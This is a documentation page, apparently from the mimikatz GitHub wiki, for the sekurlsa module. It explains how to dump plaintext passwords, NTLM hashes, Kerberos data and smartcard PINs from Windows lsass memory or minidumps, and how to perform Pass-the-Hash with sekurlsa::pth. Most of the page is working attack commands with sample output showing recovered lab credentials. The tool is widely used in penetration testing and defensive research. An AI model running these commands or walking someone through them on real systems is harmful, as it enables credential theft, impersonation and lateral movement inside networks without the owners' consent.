-
Notifications
You must be signed in to change notification settings - Fork 3.7k
module ~ sekurlsa
This module extracts passwords, keys, pin codes, tickets from the memory of lsass (Local Security Authority Subsystem Service)
the process by default, or a minidump of it! (see: howto ~ get passwords by memory dump for minidump or other dumps instructions)
When working with lsass process, mimikatz needs some rights, choice:
- Administrator, to get
debugprivilege viaprivilege::debug -
SYSTEMaccount, via post exploitation tools, scheduled tasks,psexec -s ...- in this casedebugprivilege is not needed.
Without rights to access lsass process, all commands will fail with an error like this: ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005) (except when working with a minidump).
So, do not hesitate to start with:
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # log sekurlsa.log
Using 'sekurlsa.log' for logfile : OK
...before others commands 😉
The information that can be extracted depends on the version of Windows and authentication methods: [en] http://1drv.ms/1fCWkhu
Commands: logonpasswords, pth, tickets, dpapi, minidump, process, searchpasswords, msv, wdigest, kerberos, tspkg, livessp, ssp, credman
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 88038 (00000000:000157e6)
Session : Interactive from 1
User Name : Gentil Kiwi
Domain : vm-w7-ult
SID : S-1-5-21-2044528444-627255920-3055224092-1000
msv :
[00000003] Primary
* Username : Gentil Kiwi
* Domain : vm-w7-ult
* LM : d0e9aee149655a6075e4540af1f22d3b
* NTLM : cc36cf7a8514893efccd332446158b1a
* SHA1 : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
tspkg :
* Username : Gentil Kiwi
* Domain : vm-w7-ult
* Password : waza1234/
wdigest :
* Username : Gentil Kiwi
* Domain : vm-w7-ult
* Password : waza1234/
kerberos :
* Username : Gentil Kiwi
* Domain : vm-w7-ult
* Password : waza1234/
ssp :
[00000000]
* Username : admin
* Domain : nas
* Password : anotherpassword
credman :
[00000000]
* Username : nas\admin
* Domain : nas.chocolate.local
* Password : anotherpassword
Pass-The-Hash
mimikatz can perform the well-known operation 'Pass-The-Hash' to run a process under another credentials with NTLM hash of the user's password, instead of its real password.
For this, it starts a process with a fake identity, then replaces fake information (NTLM hash of the fake password) with real information (NTLM hash of the real real password).
Arguments:
-
/user- the username you want to impersonate, keep in mind that Administrator is not the only name for this well-known account. -
/domain- the domain name - without domain or in case of local user/admin, use computer or server name,workgroupor whatever. -
/ntlm- theNTLMhash of the user's password -
/run- optional - the command line to run - default is:cmdto have a shell.
mimikatz # sekurlsa::pth /user:utilisateur /domain:chocolate /ntlm:8e3a18d453ec2450c321003772d678d5 /run:"cmd /k dir \\win81.chocolate.local\test\flag.txt"
user : utilisateur
domain : chocolate
NTLM : 8e3a18d453ec2450c321003772d678d5
Program : cmd /k dir \\win81.chocolate.local\test\flag.txt
| PID 1828
| TID 856
| LUID 0 ; 3201168 (00000000:0030d890)
\_ Data copy @ 00000000004A6300 : OK !
Remarks:
- This command does not work with minidumps (nonsense);
- it requires elevated privileges (
privilege::debugorSYSTEMaccount), unlike 'Pass-The-Ticket' which uses one official API.
See also:
- Pass-The-Ticket: kerberos::ptt
- Golden Ticket: kerberos::golden
mimikatz # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP : 'lsass.dmp'
mimikatz # sekurlsa::logonpasswords
Opening : 'lsass.dmp' file for minidump...
Authentication Id : 0 ; 88038 (00000000:000157e6)
Session : Interactive from 1
User Name : Gentil Kiwi
Domain : vm-w7-ult
SID : S-1-5-21-2044528444-627255920-3055224092-1000
msv :
[00000003] Primary
* Username : Gentil Kiwi
* Domain : vm-w7-ult
* LM : d0e9aee149655a6075e4540af1f22d3b
* NTLM : cc36cf7a8514893efccd332446158b1a
* SHA1 : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
...
Remark:
| Dump from | Works on |
|---|---|
| NT 5 - x86 | NT 5 - x86 |
| NT 5 - x64 | NT 5 - x64 |
| NT 6 - x86 | NT 6 - x86/x64 (mimikatz x86)
|
| NT 6 - x64 | NT 6 - x64 |
Some errors:
-
ERROR kuhl_m_sekurlsa_acquireLSA ; Minidump pInfos->MajorVersion (A) != MIMIKATZ_NT_MAJOR_VERSION (B)
You try to open minidump from a Windows NT of another major version (NT5 vs NT6). -
ERROR kuhl_m_sekurlsa_acquireLSA ; Minidump pInfos->ProcessorArchitecture (A) != PROCESSOR_ARCHITECTURE_xxx (B)
You try to open minidump from a Windows NT of another architecture (x86 vs x64). -
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000002)
The minidump file is not found (check path).
Authentication Id : 0 ; 3518063 (00000000:0035ae6f)
Session : Unlock from 1
User Name : Administrateur
Domain : CHOCOLATE
SID : S-1-5-21-130452501-2365100805-3685010670-500
msv :
[00010000] CredentialKeys
* RootKey : 2a099891174e2d700d44368255a53a1a0e360471343c1ad580d57989bba09a14
* DPAPI : 43d7b788389b67ee3bcac1786f01a75f
Authentication Id : 0 ; 3463053 (00000000:0034d78d)
Session : Interactive from 2
User Name : utilisateur
Domain : CHOCOLATE
SID : S-1-5-21-130452501-2365100805-3685010670-1107
msv :
[00010000] CredentialKeys
* NTLM : 8e3a18d453ec2450c321003772d678d5
* SHA1 : 90bbad2741ee9c533eb8eb37f8fb4172b8896ffa
[00000003] Primary
* Username : utilisateur
* Domain : CHOCOLATE
* LM : 00000000000000000000000000000000
* NTLM : 8e3a18d453ec2450c321003772d678d5
* SHA1 : 90bbad2741ee9c533eb8eb37f8fb4172b8896ffa
When using smartcard logon on the domain, lsass caches PIN code of the smartcard
mimikatz # sekurlsa::kerberos
[...]
kerberos :
* Username : Administrateur
* Domain : CHOCOLATE.LOCAL
* Password : (null)
* PIN code : 1234